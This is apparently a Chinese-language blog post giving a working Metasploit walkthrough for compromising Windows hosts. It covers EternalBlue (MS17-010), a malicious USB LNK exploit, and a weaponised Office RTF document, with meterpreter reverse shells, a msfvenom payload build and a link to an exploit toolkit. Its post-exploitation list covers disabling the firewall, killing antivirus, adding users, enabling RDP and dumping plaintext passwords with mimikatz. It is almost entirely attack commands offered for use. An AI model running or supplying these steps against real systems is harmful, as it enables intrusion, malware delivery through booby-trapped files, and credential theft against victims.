Msf渗透测试

ms17-010可谓一世英雄

ms17-010(smb 445)

1、漏洞检测
运行数据库
service postgresql start
启动msfconsole
msfconsole -q
使用smb_ms17_010模块探测MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.134

2、把扫描结果进行ms17-010漏洞检测
使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
option(or info)查看参数
set rhost 192.168.1.134
这需要路由器开放端口,才能返弹
set payload windows/x64/meterpreter/reverse_tcp
这直接绑定
set payload windows/x64/meterpreter/bind_tcp
run运行

CVE-2017-8464(震网漏洞)

插上U盘即中招

1
2
3
4
5
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/x64/meterpreter/reverse_tcp
set target 1
set lhost 192.168.1.20
exploit

cp -r /root/.msf4/local/ /root/1

1
2
3
4
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.20
exploit -j

这里需要注意的是生成的必须放在U盘的根目录(因为需要驱动,坑好久才成功)

CVE-2017-8570(office)

只要接受者打开文本即中招
链接:http://pan.baidu.com/s/1dF4J4PF 密码:vn0g
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.1.20/test.txt

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=4444 -f exe > shell.exe

python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.20/shell.exe -l shell.exe

1
2
3
4
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.20
exploit -j

meterpreter的基本命令

1.getwd命令:可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录,getuid,getpid
2.upload命令:可以上传文件或文件夹到目标机器
upload /root/muma.py d:\\
3.download命令:从目标机器上下载文件夹或者文件到攻击机
download muma.py /root
4.search命令:支持对远程目标机器上的文件进行搜索
5.portfwd命令:这个是meterpreter内嵌的端口转发器,目标主机开放的远程桌面3389端口
portfwd add -l 3389 -r 10.21.13.225 -p 3389
这条命令也可以开启3389远程桌面
run post/windows/manage/enable_rdp

run getgui -e
6.ps命令可以用来获取目标主机上正在运行的进程信息
7.migrate命令,将当前meterpreter会话从一个进程移植到另外一个进程的内存空间中,如果该程序中断,meterpreter也会中断
migrate 10652(pid)
8.execute命令:可以在目标机中执行文件
execute -H -f cmd.exe
9.关闭目标机器的防火墙
netsh adcfirewall set allprofiles state off
10.添加用户
run getgui -u xxxxx -p xxxxx
11.关闭杀毒软件
run killav
12.屏幕截图
screenshot
13.shell进入windows命令行,exit()回到meterpreter
14.打开cmd命令行,看看已打开的端口
netstat -ano
15.测试是不是虚拟机
run post/windows/gather/checkvm
16.获取明文账号和密码
load mimikatz
kerberos
msv

远程连接
mstsc

Donate
-------------本文结束感谢您的阅读-------------